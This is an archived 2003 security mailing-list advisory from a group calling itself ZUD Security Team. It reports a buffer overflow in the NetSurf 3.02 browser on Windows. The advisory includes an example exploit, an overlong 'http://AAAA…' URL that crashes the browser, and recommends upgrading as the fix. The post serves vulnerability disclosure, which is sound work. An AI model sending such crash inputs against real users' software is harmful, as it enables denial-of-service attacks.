Buffer Overflow in NetSurf 3.02

From: nimber (nimberat_private)
Date: Mon Aug 11 2003 - 11:26:23 PDT

Next message: yan feng: "PST Linux Advisor--------Dsh-0.24.0 in debian has a home env Buffer Overflow Vulnerability"

Previous message: G00db0y: "ZH2003-20SA (security advisory): Stellar Docs Path Disclosure and Security Leak"
In reply to: Lorenzo Hernandez Garcia-Hierro: "phpWebSite SQL Injection & DoS & XSS Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#################################
# ZUD SECURITY TEAM PRESENT     #
################################                               
#    bug found by nimber        #
# Email : nimberat_private    #
# Site:    www.zudteam.org      #
# HomePage: www.nimber.plux.ru  #         
#          7.08.2003            #
################################
Application: NetSurf
Versions: 3.02 (and all?)
Platform: Windows
Web Site: www.klodware.narod.ru
          www.klodware.nm.ru
Bug: Buffer Overflow.
Exploit(exaple): 
Crash browser by sending long http request.
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#################################
#Fix: Download new version.     #
################################

Next message: yan feng: "PST Linux Advisor--------Dsh-0.24.0 in debian has a home env Buffer Overflow Vulnerability"
Previous message: G00db0y: "ZH2003-20SA (security advisory): Stellar Docs Path Disclosure and Security Leak"
In reply to: Lorenzo Hernandez Garcia-Hierro: "phpWebSite SQL Injection & DoS & XSS Vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 11 2003 - 12:35:36 PDT